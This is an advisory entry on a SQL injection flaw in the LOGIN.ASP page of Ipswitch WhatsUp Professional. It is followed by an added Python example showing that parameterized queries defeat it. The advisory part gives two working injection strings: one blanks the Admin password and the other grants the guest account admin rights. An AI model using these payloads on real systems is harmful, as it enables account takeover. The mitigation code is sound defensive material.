Ipswitch WhatsUp Professional LOGIN.ASP SQL Injection Vulnerability
An exploit is not required. The following proof of concept is available:

Reset the Admin user password to a blank password:
- 'UPDATE WebUser SET sPassword=DEFAULT WHERE sUserName='Admin'--

Elevate Guest user privileges to Admin privileges:
- 'UPDATE WebUser SET nUserRightsMask=-1 WHERE sUserName='guest'--
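The mitigation for this class of flaw is to bind the login fields as query parameters. The following is an added example, not code from the advisory or from the product: it uses an in-memory SQLite table as a stand-in, the query shape, sample rows and the function names are assumptions, and only the table and column names and the two test strings come from the proof of concept above.

```python
import sqlite3

# Strings quoted in the advisory, used here only as hostile test input.
PAYLOADS = [
    "'UPDATE WebUser SET sPassword=DEFAULT WHERE sUserName='Admin'--",
    "'UPDATE WebUser SET nUserRightsMask=-1 WHERE sUserName='guest'--",
]

def make_db():
    """Constructed stand-in table; rows and passwords are sample values."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE WebUser (sUserName TEXT PRIMARY KEY, "
               "sPassword TEXT DEFAULT '', nUserRightsMask INTEGER)")
    db.executemany("INSERT INTO WebUser VALUES (?, ?, ?)",
                   [("Admin", "constructed-admin-pw", -1),
                    ("guest", "constructed-guest-pw", 1)])
    db.commit()
    return db

def snapshot(db):
    """Full table contents, used to detect any modification."""
    return db.execute("SELECT sUserName, sPassword, nUserRightsMask "
                      "FROM WebUser ORDER BY sUserName").fetchall()

def login(db, user, password):
    """Bound parameters: user and password travel as values, never as SQL text."""
    row = db.execute("SELECT nUserRightsMask FROM WebUser "
                     "WHERE sUserName = ? AND sPassword = ?",
                     (user, password)).fetchone()
    return None if row is None else row[0]

def run_check():
    """Feed both advisory strings to login(); report results and table integrity."""
    db = make_db()
    before = snapshot(db)
    results = [login(db, p, "") for p in PAYLOADS]
    return results, before == snapshot(db)

if __name__ == "__main__":
    print(run_check())
```

With bound parameters the quote and comment characters in the input are compared literally against sUserName, so neither string matches a row and the table is left unchanged.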